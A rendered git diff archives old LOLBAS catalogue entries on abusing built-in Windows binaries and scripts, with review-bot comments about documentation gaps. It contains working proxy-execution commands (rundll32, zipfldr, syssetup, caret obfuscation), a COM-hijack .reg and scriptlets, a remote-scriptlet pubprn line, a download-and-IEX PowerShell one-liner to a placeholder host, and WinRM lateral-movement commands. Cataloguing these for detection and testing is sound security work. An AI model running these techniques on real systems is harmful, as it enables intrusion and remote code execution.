| * Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)   | ||||
|     | ||||
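Review bot: `rundll32.exe shell32.dll,Control_RunDLL payload.dll` is described only as "Launch DLL payload"; document that Control_RunDLL loads the argument as a Control Panel applet, so a test DLL is expected to export CPlApplet and its code otherwise runs from DllMain on load, which matters to anyone building one. The third example mixes styles (`rundll32 SHELL32.DLL` without `.exe`, upper-case name) with the two lines before it.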
							
								
								
									
Archive-Old-Version/OSLibraries/Syssetup.dll.md (Normal file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| ## Syssetup.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF | ||||
| Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. | ||||
|  | ||||
| rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/994392481927258113 | ||||
|   * https://twitter.com/harr0ey/status/975350238184697857 | ||||
|   * https://twitter.com/bohops/status/975549525938135040 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Syssetup.dll | ||||
|   * c:\windows\sysWOW64\Syssetup.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)   | ||||
|     | ||||
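Review bot: same documentation gap as Setupapi.dll.md: both examples use mode 128 without saying what it means, the COM-scriptlet case relies on an unspecified `c:\\test\\shady.inf`, and the two lines disagree on form (`rundll32 syssetup,` with `c:\temp\calc.INF` vs `rundll32.exe syssetup.dll,` with `c:\\test\\shady.inf`). One sample .inf shared by the setupapi and syssetup entries would close the gap for both.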
							
								
								
									
Archive-Old-Version/OSLibraries/Url.dll.md (Normal file, 36 lines)
							| @@ -0,0 +1,36 @@ | ||||
| ## Url.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta" | ||||
| Launch a HTML application payload by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL "C:\\test\\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,FileProtocolHandler calc.exe | ||||
| Launch an executable payload by calling FileProtocolHandler. | ||||
|  | ||||
| rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta | ||||
| Launch a HTML application payload by calling FileProtocolHandler. | ||||
|  | ||||
| rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling FileProtocolHandler. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/974043815655956481 | ||||
|   * https://twitter.com/DissectMalware/status/995348436353470465 | ||||
|   * https://twitter.com/yeyint_mth/status/997355558070927360 | ||||
|   * https://twitter.com/Hexacorn/status/974063407321223168 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\url.dll | ||||
|   * c:\windows\sysWOW64\url.dll | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)   | ||||
|     | ||||
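Review bot: the caret examples such as `rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e` only work when the line is typed into cmd.exe, which strips `^` as its escape character before rundll32 sees the argument; say so, because the same string passed straight to CreateProcess or from PowerShell hands rundll32 the literal carets. The OpenURL and FileProtocolHandler caret lines demonstrate the same thing, so credit the obfuscation once and keep one canonical form (`rundll32` vs `rundll32.exe` differs between them).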
							
								
								
									
Archive-Old-Version/OSLibraries/Zipfldr.dll.md (Normal file, 21 lines)
							| @@ -0,0 +1,21 @@ | ||||
| ## Zipfldr.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe zipfldr.dll,RouteTheCall calc.exe | ||||
| Launch an executable payload by calling RouteTheCall. | ||||
|  | ||||
| rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling RouteTheCall. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/moriarty_meng/status/977848311603380224 | ||||
|   * https://twitter.com/bohops/status/997896811904929792 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\zipfldr.dll | ||||
|   * c:\windows\sysWOW64\zipfldr.dll | ||||
|     | ||||
| * Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)   | ||||
|     | ||||
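Review bot: the Notes line credits @yeyint_mth for the obfuscation variant, but Resources lists only the @moriarty_meng and @bohops tweets; add the source for the caret form (Url.dll.md cites one) so the credit is backed. The caret example carries the same cmd.exe-only caveat as the Url.dll entry and should say so.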
							
								
								
									
Archive-Old-Version/OSScripts/CL_Invocation.ps1.md (Normal file, 20 lines)
							| @@ -0,0 +1,20 @@ | ||||
| ## CL_Invocation.ps1 | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args] | ||||
| Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ | ||||
|   * https://twitter.com/bohops/status/948548812561436672 | ||||
|   * https://twitter.com/pabraeken/status/995107879345704961 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 | ||||
|   * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)   | ||||
|     | ||||
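Review bot: the example `. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]` contains a literal `\n` and doubled backslashes that leaked in from an escaped source string; as written it is not a valid PowerShell line. Split it into the dot-source and the `SyncInvoke` call on two lines, as CL_Mutexverifiers.ps1.md already does, and use single backslashes.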
							
								
								
									
Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md (Normal file, 19 lines)
							| @@ -0,0 +1,19 @@ | ||||
| ## CL_Mutexverifiers.ps1 | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1    | ||||
| runAfterCancelProcess calc.ps1 | ||||
| Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/995111125447577600 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 | ||||
|   * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)   | ||||
|     | ||||
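Review bot: the Full path list repeats `C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1` twice and omits the AERO path, even though the example dot-sources `C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1`; replace the duplicate with the AERO entry. The description says runAfterCancelProcess is used "to launch an executable", but the example argument is `calc.ps1`; state whether the function takes a script or an executable.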
							
								
								
									
Archive-Old-Version/OSScripts/Manage-bde.wsf.md (Normal file, 20 lines)
							| @@ -0,0 +1,20 @@ | ||||
| ## Manage-bde.wsf | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf | ||||
| Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. | ||||
|  | ||||
| copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf | ||||
| Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 | ||||
|   * https://twitter.com/bohops/status/980659399495741441 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\manage-bde.wsf | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)   | ||||
|     | ||||
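Review bot: the Notes line credits "Jimmy - @bophops"; the handle is @bohops, as both Resources URLs show. In the path-hijack example, `copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf`, the `cd` is the step that makes the hijack work (the script resolves manage-bde.exe relative to the current directory, not to its own location), so the description should say that rather than just "in the same directory".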
							
								
								
									
Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct (Normal file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
|     remotable="true" | ||||
| 	> | ||||
| </registration> | ||||
|  | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 	 | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
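Review bot: the declaration `<?XML version="1.0"?>` uses an uppercase target; `<?xml version="1.0"?>` is the well-formed spelling and is what a strict XML parser expects, so prefer it even if the scriptlet host tolerates the uppercase form. Inside the CDATA block the result of `.Run("calc.exe")` is assigned to `r` and never read, and the two tab-only lines after it are dead whitespace; drop the assignment (`new ActiveXObject("WScript.Shell").Run("calc.exe");`) and the blank lines. The `>` closing the `<registration` element sits on its own tab-indented line, which is harmless but inconsistent with the four-space indentation of the attributes above it.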
							
								
								
									
24  Archive-Old-Version/OSScripts/Payload/Slmgr.reg  Normal file
							| @@ -0,0 +1,24 @@ | ||||
| Windows Registry Editor Version 5.00 | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | ||||
| @="" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] | ||||
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | ||||
|  | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] | ||||
| @="Scripting.Dictionary" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] | ||||
| @="C:\\WINDOWS\\system32\\scrobj.dll" | ||||
| "ThreadingModel"="Apartment" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] | ||||
| @="Scripting.Dictionary" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] | ||||
| @="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] | ||||
| @="Scripting.Dictionary" | ||||
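Review bot: the ScriptletURL value references `https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct`, i.e. the old repository and the pre-archive path, while this commit places the scriptlet at Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct; the reference goes stale as soon as the move lands, so either update it or state in the notes that it points at the historical location. The file also rewrites the user's `HKCU\Software\Classes\Scripting.Dictionary` and `CLSID\{00000001-0000-0000-0000-0000FEEDACDC}` keys with no companion file that removes them again; a matching revert .reg (or a sentence telling testers which keys to delete) would leave test systems clean after a demonstration. Minor: there is a double blank line between the `Scripting.Dictionary\CLSID` section and the `CLSID\{...}` section.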
							
								
								
									
22  Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct  Normal file
							| @@ -0,0 +1,22 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Scripting.Dictionary" | ||||
|     progid="Scripting.Dictionary" | ||||
|     version="1" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
|     remotable="true" | ||||
| 	> | ||||
| </registration> | ||||
|  | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 	 | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
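Review bot: apart from the `description`, `progid` and `version` attributes this file duplicates Pubprn_calc.sct line for line, including the classid `{AAAA1111-0000-0000-0000-0000FEEDACDC}`; two scriptlets that register under the same CLSID will overwrite each other's registration, so give each payload its own id if both are kept. The version strings are also inconsistent between the two copies (`version="1"` here, `version="1.00"` in Pubprn_calc.sct), and the unused `var r` plus the trailing tab-only lines inside the CDATA block carry over unchanged; trim them here as well.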
							
								
								
									
19  Archive-Old-Version/OSScripts/Pubprn.vbs.md  Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## Pubprn.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct | ||||
| Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://github.com/enigma0x3/windows-operating-system-archaeology | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs | ||||
|   * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3   | ||||
|     | ||||
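Review bot: "Set the 2nd variable with a Script COM moniker" should say "second argument": pubprn.vbs takes positional command-line arguments, and in the example `127.0.0.1` is the first and `script:https://domain.com/folder/file.sct` the second. The moniker is spelled `script:` in the command, so the description should use the same lowercase form rather than "Script". `domain.com/folder/file.sct` is a placeholder and is best marked as one, as the other entries do with `c:\path\to\`.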
							
								
								
									
18  Archive-Old-Version/OSScripts/Slmgr.vbs.md  Normal file
							| @@ -0,0 +1,18 @@ | ||||
| ## Slmgr.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs | ||||
| Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://www.youtube.com/watch?v=3gz1QmiMhss | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\slmgr.vbs | ||||
|   * c:\windows\sysWOW64\slmgr.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee   | ||||
|     | ||||
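Review bot: `c:\path\to\Slmgr.reg` is a placeholder with nothing telling the reader that the registry file it stands for is added in this same commit as Archive-Old-Version/OSScripts/Payload/Slmgr.reg; add that path under Resources or Notes so the import command can be traced to its input. The Full path entries are written as `c:\windows\system32\slmgr.vbs` and `c:\windows\sysWOW64\slmgr.vbs`, whereas the other entries use `C:\Windows\System32` and `C:\Windows\SysWOW64`; normalise the casing for consistency.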
| @@ -0,0 +1,17 @@ | ||||
| ## SyncAppvPublishingServer.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
| Inject PowerShell script code with the provided arguments | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/monoxgas/status/895045566090010624 | ||||
|   * https://twitter.com/subTee/status/855738126882316288 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\SyncAppvPublishingServer.vbs | ||||
|     | ||||
| * Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee   | ||||
|     | ||||
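Review bot: the description "Inject PowerShell script code with the provided arguments" is vaguer than the example it sits under, which shows the text after the leading `n;` being run as PowerShell (a `DownloadString` piped to `IEX`); say that, and add the missing trailing period so it matches the other entries. `http://some.url/script.ps1` is a placeholder and should be labelled as such. This hunk also appears without its own file header in the rendered diff, directly after the Slmgr.vbs.md hunk; confirm the file is recorded as Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md alongside the other archived scripts.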
							
								
								
									
27  Archive-Old-Version/OSScripts/Winrm.vbs.md  Normal file
							| @@ -0,0 +1,27 @@ | ||||
| ## Winrm.vbs | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig | ||||
| Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. | ||||
|  | ||||
| winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 | ||||
| Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. | ||||
|  | ||||
| winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 | ||||
| Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://www.youtube.com/watch?v=3gz1QmiMhss | ||||
|   * https://github.com/enigma0x3/windows-operating-system-archaeology | ||||
|   * https://redcanary.com/blog/lateral-movement-winrm-wmi/ | ||||
|   * https://twitter.com/bohops/status/994405551751815170 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\windows\system32\winrm.vbs | ||||
|   * C:\windows\SysWOW64\winrm.vbs | ||||
|     | ||||
| * Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)   | ||||
|     | ||||
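Review bot: the third example contains a literal `\n` between the two commands (`... -r:http://acmedc:5985   \nwinrm invoke StartService ...`), so it renders as one unusable line; put the `Create` and `StartService` invocations on separate lines the way the other examples are laid out. The host names differ between examples (`target` in the Win32_Process example, `acmedc` in the Win32_Service one); pick one placeholder. In the Notes, `@subtee` is written `@subTee` in Slmgr.vbs.md and SyncAppvPublishingServer.vbs.md, and the first example reuses the `c:\path\to\Slmgr.reg` placeholder that Slmgr.vbs.md also leaves unreferenced, so the same pointer to Archive-Old-Version/OSScripts/Payload/Slmgr.reg is needed here.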
Some files were not shown because too many files have changed in this diff.